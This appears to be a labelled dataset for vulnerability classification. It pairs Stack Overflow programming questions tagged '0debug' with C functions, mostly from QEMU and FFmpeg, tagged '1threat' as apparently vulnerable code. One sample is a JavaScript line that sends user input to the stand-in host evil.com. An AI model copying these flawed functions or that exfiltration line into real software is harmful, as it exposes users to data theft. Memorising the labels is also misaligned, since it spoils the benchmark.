How to replace string in angular 2? : <p>I have used with below interpolation in html page.</p> <pre><code>&lt;div&gt;{{config.CompanyAddress.replace('\n','&lt;br /&gt;')}}&lt;/div&gt; </code></pre> <p>and also used</p> <pre><code>&lt;div&gt;{{config.CompanyAddress.toString().replace('\n','&lt;br /&gt;')}}&lt;/div&gt; </code></pre> <p>But both are showing text as below</p> <pre><code>{{config.CompanyAddress.replace('\n','&lt;br /&gt;')}} {{config.CompanyAddress.toString().replace('\n','&lt;br /&gt;')}} </code></pre>
0debug
int64_t qmp_query_migrate_cache_size(Error **errp) { return migrate_xbzrle_cache_size(); }
1threat
how to insert html after a specific element with a class using jQuery : <pre><code> &lt;html&gt; &lt;body&gt; &lt;div class="carousel-inner"&gt; &lt;!-- my jQuery content here --&gt; &lt;a data-slide="prev" href="#quote-carousel" class="left carousel-control"&gt;&lt;i class="fa fa-chevron-left"&gt;&lt;/i&gt;&lt;/a&gt; &lt;/div&gt; </code></pre> <p>I am producing an html snippet and wanted to know how I can insert the html within the DIV tags shown above. Specifically immediately after the <strong>div class="carousel-inner"</strong> and before the <strong>a data-slide</strong></p> <p>I tried using </p> <pre><code> $('body').append(html); </code></pre> <p>but that added the html to the end of the file </p>
0debug
Schedule a work on a specific time with WorkManager : <blockquote> <p>WorkManager is a library used to enqueue work that is guaranteed to execute after its constraints are met.</p> </blockquote> <p>Hence, After going though the <a href="https://developer.android.com/reference/androidx/work/Constraints" rel="noreferrer">Constraints</a> class I haven't found any function to add time constraint on the work. For like example, I want to start a work to perform at 8:00am (The work can be any of two types <a href="https://developer.android.com/reference/androidx/work/OneTimeWorkRequest" rel="noreferrer">OneTimeWorkRequest</a> or <a href="https://developer.android.com/reference/androidx/work/PeriodicWorkRequest" rel="noreferrer">PeriodicWorkRequest</a>) in the morning. How can I add constraint to schedule this work with WorkManager.</p>
0debug
static void test_validate_fail_list(TestInputVisitorData *data, const void *unused) { UserDefOneList *head = NULL; Error *err = NULL; Visitor *v; v = validate_test_init(data, "[ { 'string': 'string0', 'integer': 42 }, { 'string': 'string1', 'integer': 43 }, { 'string': 'string2', 'integer': 44, 'extra': 'ggg' } ]"); visit_type_UserDefOneList(v, &head, NULL, &err); g_assert(err); error_free(err); qapi_free_UserDefOneList(head); }
1threat
Error invalid operands to binary : <p>I am a beginner and I am using dev c++ . I am trying to write a function to determine which quadrant it lies in. Its fairly simple, but I am getting an error [Error] invalid operands to binary &lt;&lt; (have 'float' and 'int')</p> <pre><code>#include &lt;stdio.h&gt; int quadrant (float i, float j); int main() { float a,b; int c; scanf ("%f,%f",&amp;a,&amp;b); c=quadrant(a,b); printf("the given point lies in %d quadrant",c); return 0; } int quadrant (float i, float j) { if (i&gt;&gt;0 &amp;&amp; j&gt;&gt;0) return 1; else if (i&gt;&gt;0 &amp;&amp; j&lt;&lt;0) return 4; else if (i&lt;&lt;0 &amp;&amp; j&gt;&gt;0) return 2; else if (i&lt;&lt;0 &amp;&amp; j&lt;&lt;0) return 3; else return 0; } </code></pre> <p>Is it because float numbers cant be used with binary operands? I replaced floats with int, all the floats. This time when I compile I get error ID: return 1 status. What is wrong with my code?</p>
0debug
uint64_t kvmppc_rma_size(uint64_t current_size, unsigned int hash_shift) { if (cap_ppc_rma >= 2) { return current_size; } return MIN(current_size, getrampagesize() << (hash_shift - 7)); }
1threat
static int qcow2_create(const char *filename, QEMUOptionParameter *options) { const char *backing_file = NULL; const char *backing_fmt = NULL; uint64_t sectors = 0; int flags = 0; size_t cluster_size = DEFAULT_CLUSTER_SIZE; int prealloc = 0; while (options && options->name) { if (!strcmp(options->name, BLOCK_OPT_SIZE)) { sectors = options->value.n / 512; } else if (!strcmp(options->name, BLOCK_OPT_BACKING_FILE)) { backing_file = options->value.s; } else if (!strcmp(options->name, BLOCK_OPT_BACKING_FMT)) { backing_fmt = options->value.s; } else if (!strcmp(options->name, BLOCK_OPT_ENCRYPT)) { flags |= options->value.n ? BLOCK_FLAG_ENCRYPT : 0; } else if (!strcmp(options->name, BLOCK_OPT_CLUSTER_SIZE)) { if (options->value.n) { cluster_size = options->value.n; } } else if (!strcmp(options->name, BLOCK_OPT_PREALLOC)) { if (!options->value.s || !strcmp(options->value.s, "off")) { prealloc = 0; } else if (!strcmp(options->value.s, "metadata")) { prealloc = 1; } else { fprintf(stderr, "Invalid preallocation mode: '%s'\n", options->value.s); return -EINVAL; } } options++; } if (backing_file && prealloc) { fprintf(stderr, "Backing file and preallocation cannot be used at " "the same time\n"); return -EINVAL; } return qcow2_create2(filename, sectors, backing_file, backing_fmt, flags, cluster_size, prealloc, options); }
1threat
document.location = 'http://evil.com?username=' + user_input;
1threat
how best find data with getJSON? : i have problem to filtering data with `jquery` and `json` how do the best find data with `javascript` ? help find solved my problem. thanks this my code [here][1] [1]: https://jsfiddle.net/vgrj1L80/110/
0debug
What is the best way to implement multi tenancy in Azure Database : <p>We are planning to implement a multi tenant application in Azure cloud. I am looking for a best way to implement this in DB level. The DB schema is huge, we have 100s of tables spread across multiple modules. And the data size varies for each client. For some it might be 100s of rows in the tables. But for some it could be millions of rows. What is the best approach to implement Elastic DB in these kind of scenarios?</p> <p>How do i design sharding in this case? Single tenant per shard or list of tenants? If I create a list of tenants per shard and adjacent tenants have lot of data and it will be overcrowded. How can we efficiently find a shard key to partition?</p> <p>If I do single tenant per shard, Can I scale up single shard based on the data size?</p> <p>Did anyone came across these kind of scenarios? Please help me with some sample links?</p> <p>Thank you for your Help! </p>
0debug
Different behaviour when running script vs IRB console? : <p>I have a simple code snippet that defines a method (on Ruby's Main Object), and then checks to see if it is defined.</p> <pre><code>puts "#{self} #{self.class}" def foo;end puts self.methods.include?(:foo) </code></pre> <p>When I run this in a Ruby console. I get:</p> <pre><code>main Object true </code></pre> <p>If I paste this code into a .rb file and run the file like so <code>ruby test_script.rb</code>, I get the following output</p> <pre><code>main Object false </code></pre> <p>I can't work out why I am seeing this behaviour. The method <em>is</em> being defined in the script, as I can call the method.</p> <p>I'm running both on Ruby 2.3.4</p>
0debug
The scanf don't store my sum : <p>When the code run, my scanf don't show the sum, just 0.00000000.</p> <p>I don't know where is the problem.</p> <pre><code>int main() { float A, B; float R = A+B; printf("Digita o valor A: "); scanf("%f",&amp;A); printf("Digite o valor B: "); scanf("%f",&amp;B); printf("A soma de %f e %f foi igual a: %f",A,B,R); return 0; } </code></pre>
0debug
Create (click) event on MatTab Material : <p>I dynamically loop thru tabs and i would like to add a (click) event on to be able to load different options when i select tab. </p> <p>Isn't it possible to have an event (click) event on ? I tried with (selectChange) on but then i cannot get hold of bank.id from my loop when creating tabs. </p> <p>Isn't it possible to add simple click event on dynamically created tabs??</p> <pre><code> &lt;mat-tab-group&gt; &lt;mat-tab label="All transactions"&gt; &lt;mat-list&gt; &lt;mat-list-item *ngFor="let bank of banks"&gt; &lt;h4 mat-line&gt;{{bank.fullName}}&lt;/h4&gt; &lt;/mat-list-item&gt; &lt;/mat-list&gt; &lt;/mat-tab&gt; &lt;mat-tab *ngFor="let bank of banks" (click)="fetchAccounts(bank.id)" label="{{bank.fullName}}"&gt; &lt;mat-list&gt; &lt;mat-list-item *ngFor="let account of accounts"&gt; &lt;h4 mat-line&gt;{{bank2.fullName}}&lt;/h4&gt; &lt;/mat-list-item&gt; &lt;/mat-list&gt; &lt;/mat-tab&gt; &lt;!-- &lt;mat-tab label="Test Bank" disabled&gt; No content &lt;/mat-tab&gt; --&gt; &lt;/mat-tab-group&gt; </code></pre>
0debug
Get by HTML element with React Testing Library? : <p>I'm using the <code>getByTestId</code> function in React Testing Library: </p> <pre><code>const button = wrapper.getByTestId("button"); expect(heading.textContent).toBe("something"); </code></pre> <p>Is it possible / advisable to search for HTML elements instead? So something like this:</p> <pre><code>const button = wrapper.getByHTML("button"); const heading = wrapper.getByHTML("h1"); </code></pre>
0debug
Weird behaviour with groupby on ordered categorical columns : <p>MCVE</p> <pre><code>df = pd.DataFrame({ 'Cat': ['SF', 'W', 'F', 'R64', 'SF', 'F'], 'ID': [1, 1, 1, 2, 2, 2] }) df.Cat = pd.Categorical( df.Cat, categories=['R64', 'SF', 'F', 'W'], ordered=True) </code></pre> <p></p> <p>As you can see, I've define an ordered categorical column on <code>Cat</code>. To verify, check;</p> <pre><code>0 SF 1 W 2 F 3 R64 4 SF 5 F Name: Cat, dtype: category Categories (4, object): [R64 &lt; SF &lt; F &lt; W] </code></pre> <p>I want to find the largest category PER ID. Doing <code>groupby</code> + <code>max</code> works.</p> <pre><code>df.groupby('ID').Cat.max() ID 1 W 2 F Name: Cat, dtype: object </code></pre> <p>But I don't want ID to be the index, so I specify <code>as_index=False</code>.</p> <pre><code>df.groupby('ID', as_index=False).Cat.max() ID Cat 0 1 W 1 2 SF </code></pre> <p>Oops! Now, the max is taken <strong>lexicographically</strong>. Can anyone explain whether this is intended behaviour? Or is this a bug?</p> <p>Note, for this problem, the workaround is <code>df.groupby('ID').Cat.max().reset_index()</code>.</p> <p>Note, </p> <pre><code>&gt;&gt;&gt; pd.__version__ '0.22.0' </code></pre>
0debug
Problem with dinamic URL rewrite with .htaccess : I had spend last few hours to get static URL from dynamic URL with .htaccess If I get wanted URL I also get 404 error. Dynamic URL is EN/section.php?lang=$1&url=$2 I had wrote ^(.*)/(.*)$ and it doesn't work. This work well with some prefix like ^language-(.*)/(.*)$ and then I get URL like domain/language-en/some-section and it works but it is not wanted URL RewriteRule ^(.*)/(.*)$ EN/section.php?lang=$1&url=$2 [L] I expect URL like domain/en/some-section not URL like domain/language-en/some-section.
0debug
How to convert SQL Query to Laravel Query Builder : select student_id ,count(case when attendance_status ='Absent' then 1 end) as absent_count ,count(case when attendance_status ='Present' then 1 end) as present_count ,count(case when attendance_status ='Leave' then 1 end) as leave_count ,count(distinct date) as Tot_count from tbl_student_attendance where month='September' group by student_id ;
0debug
static int local_utimensat(FsContext *s, V9fsPath *fs_path, const struct timespec *buf) { char *buffer; int ret; char *path = fs_path->data; buffer = rpath(s, path); ret = qemu_utimens(buffer, buf); g_free(buffer); return ret; }
1threat
static int64_t alloc_clusters_noref(BlockDriverState *bs, int64_t size) { BDRVQcowState *s = bs->opaque; int i, nb_clusters; nb_clusters = size_to_clusters(s, size); retry: for(i = 0; i < nb_clusters; i++) { int64_t i = s->free_cluster_index++; if (get_refcount(bs, i) != 0) goto retry; } #ifdef DEBUG_ALLOC2 printf("alloc_clusters: size=%" PRId64 " -> %" PRId64 "\n", size, (s->free_cluster_index - nb_clusters) << s->cluster_bits); #endif return (s->free_cluster_index - nb_clusters) << s->cluster_bits; }
1threat
export double value with comma : <p>i need to generate excel that display double values with a comma as grouping symbol. example :100000000.00 ------> 100,000,000.00 </p> <p>the comma symbol for group and the Dot symbol for decimal separator thanks,</p>
0debug
static int poll_filters(void) { AVFilterBufferRef *picref; AVFrame *filtered_frame = NULL; int i, frame_size; for (i = 0; i < nb_output_streams; i++) { OutputStream *ost = output_streams[i]; OutputFile *of = output_files[ost->file_index]; int ret = 0; if (!ost->filter) continue; if (!ost->filtered_frame && !(ost->filtered_frame = avcodec_alloc_frame())) { return AVERROR(ENOMEM); } else avcodec_get_frame_defaults(ost->filtered_frame); filtered_frame = ost->filtered_frame; while (ret >= 0 && !ost->is_past_recording_time) { if (ost->enc->type == AVMEDIA_TYPE_AUDIO && !(ost->enc->capabilities & CODEC_CAP_VARIABLE_FRAME_SIZE)) ret = av_buffersink_read_samples(ost->filter->filter, &picref, ost->st->codec->frame_size); else ret = av_buffersink_read(ost->filter->filter, &picref); if (ret < 0) break; avfilter_copy_buf_props(filtered_frame, picref); if (picref->pts != AV_NOPTS_VALUE) filtered_frame->pts = av_rescale_q(picref->pts, ost->filter->filter->inputs[0]->time_base, ost->st->codec->time_base) - av_rescale_q(of->start_time, AV_TIME_BASE_Q, ost->st->codec->time_base); if (of->start_time && filtered_frame->pts < of->start_time) { avfilter_unref_buffer(picref); continue; } switch (ost->filter->filter->inputs[0]->type) { case AVMEDIA_TYPE_VIDEO: if (!ost->frame_aspect_ratio) ost->st->codec->sample_aspect_ratio = picref->video->pixel_aspect; do_video_out(of->ctx, ost, filtered_frame, &frame_size, same_quant ? ost->last_quality : ost->st->codec->global_quality); if (vstats_filename && frame_size) do_video_stats(of->ctx, ost, frame_size); break; case AVMEDIA_TYPE_AUDIO: do_audio_out(of->ctx, ost, filtered_frame); break; default: av_assert0(0); } avfilter_unref_buffer(picref); } } return 0; }
1threat
Automatic centering of Google maps on points : <p>I have this code:</p> <pre><code>&lt;script src="https://maps.googleapis.com/maps/api/js?sensor=false"&gt;&lt;/script&gt; &lt;style&gt; #map_canvas { border:1px solid transparent; height: 400px; width: 100%; } &lt;/style&gt; &lt;div class="col-xs-12 col-sm-12 col-md-12 col-lg-6 padding_all_right_4"&gt; &lt;div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 padding_all_3"&gt; &lt;h2 class="h2"&gt;Atrakcje w okolicy&lt;/h2&gt; &lt;/div&gt; &lt;div class="col-xs-12 col-sm-6 col-md-6 col-lg-6 padding_all_2"&gt; &lt;a href ="#" class="obj-1" id="obj-1"&gt; &lt;div class="apartament_atrakcje"&gt;Atrakcja 1 pl&lt;/div&gt; &lt;/a&gt; &lt;/div&gt; &lt;div class="col-xs-12 col-sm-6 col-md-6 col-lg-6 padding_all_2"&gt; &lt;a href ="#" class="obj-2" id="obj-2"&gt; &lt;div class="apartament_atrakcje"&gt;Atrakcja 2 PL&lt;/div&gt; &lt;/a&gt; &lt;/div&gt; &lt;div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 padding_all_0"&gt; &lt;div class="apartament_mapa"&gt; &lt;div id="map_canvas"&gt;&lt;/div&gt; &lt;script&gt; var locations = [ ['Atrakcja 1 pl', 51.73925413, 19.51309225, 1], ['Atrakcja 2 PL', 53.41475000, 14.60220358, 2], ]; var map; var markers = []; function init(){ map = new google.maps.Map(document.getElementById('map_canvas'), { zoom: 10, center: new google.maps.LatLng(-33.92, 151.25), mapTypeId: google.maps.MapTypeId.ROADMAP }); var num_markers = locations.length; for (var i = 0; i &lt; num_markers; i++) { markers[i] = new google.maps.Marker({ position: {lat:locations[i][1], lng:locations[i][2]}, map: map, html: locations[i][0], id: i, }); google.maps.event.addListener(markers[i], 'click', function(){ var infowindow = new google.maps.InfoWindow({ id: this.id, content:this.html, position:this.getPosition() }); google.maps.event.addListenerOnce(infowindow, 'closeclick', function(){ markers[this.id].setVisible(true); }); this.setVisible(false); infowindow.open(map); }); } } init(); &lt;/script&gt; </code></pre> <p>The script displays 2 points on the google map. I have a problem with centering the map on these points. Currently, I enter the coordinates of the centering of the map in the page code, however points on the map are added from the CMS and must center automatically :(</p> <p>Does anyone know how to do it?</p>
0debug
void cpu_outb(pio_addr_t addr, uint8_t val) { LOG_IOPORT("outb: %04"FMT_pioaddr" %02"PRIx8"\n", addr, val); trace_cpu_out(addr, val); ioport_write(0, addr, val); }
1threat